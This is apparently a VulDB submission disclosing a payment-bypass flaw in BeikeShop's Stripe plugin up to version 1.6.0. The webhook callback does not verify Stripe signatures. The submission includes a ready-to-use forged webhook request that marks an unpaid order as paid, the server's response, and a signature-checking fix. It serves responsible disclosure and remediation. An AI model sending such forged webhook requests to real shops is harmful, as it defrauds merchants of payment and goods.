| 标题 | BeikeShop 1.6.0 Design/Logic Flaw |
|---|
| 描述 | 1. TITLE
BeikeShop Stripe Plugin Missing Webhook Signature Verification Leads to Payment Bypass
2. PRODUCT
BeikeShop
3. VENDOR
BeikeShop / Guangda
4. VERSION
<= 1.6.0
5. CWE
CWE-347: Improper Verification of Cryptographic Signature
6. CVSS 3.1
7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
7. CATEGORY
Web Application / Payment Gateway
8. SUMMARY
The Stripe payment plugin in BeikeShop does not verify webhook signatures on the `/callback/stripe` endpoint. A remote unauthenticated attacker can forge Stripe webhook events and transition arbitrary orders into the paid state without completing a legitimate payment.
9. VULNERABLE CODE
File: `plugins/Stripe/Controllers/StripeController.php`
The `callback()` method reads attacker-controlled JSON input from `$request->all()` and directly processes `charge.succeeded` events without calling `\Stripe\Webhook::constructEvent()` to verify the `Stripe-Signature` header.
10. PROOF OF CONCEPT
```http
POST /callback/stripe HTTP/1.1
Host: TARGET
Content-Type: application/json
{
"type":"charge.succeeded",
"data":{
"object":{
"metadata":{
"order_number":"KNOWN-ORDER-NUMBER"
}
}
}
}
```
Response:
```json
{"status":"success","message":"Capture Successfully"}
```
Result:
`orders.status` changes from `unpaid` to `paid`.
11. IMPACT
* Unauthorized order state manipulation
* Payment bypass
* Inventory deduction for unpaid orders
* Integrity impact on order and sales data
* Potential financial loss
12. SOLUTION
Implement Stripe webhook signature verification before processing webhook events:
```php
$payload = $request->getContent();
$sigHeader = $request->header('Stripe-Signature');
$secret = plugin_setting('stripe.webhook_secret');
$event = \Stripe\Webhook::constructEvent(
$payload,
$sigHeader,
$secret
);
```
Reject webhook requests when signature verification fails.
13. AUTHENTICATION
None required
14. USER INTERACTION
None required |
|---|
| 来源 | ⚠️ https://github.com/nuiifornet/BeikeShop-Vulnerability/blob/main/README.md |
|---|
| 用户 | Fklov (UID 98102) |
|---|
| 提交 | 2026-05-16 11時06分 (24 日前) |
|---|
| 管理 | 2026-06-07 09時32分 (22 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 369082 [Chengdu Everbrite Network Technology BeikeShop 直到 1.6.0.22 Stripe Plugin StripeController.php callback 请求 权限提升] |
|---|
| 积分 | 20 |
|---|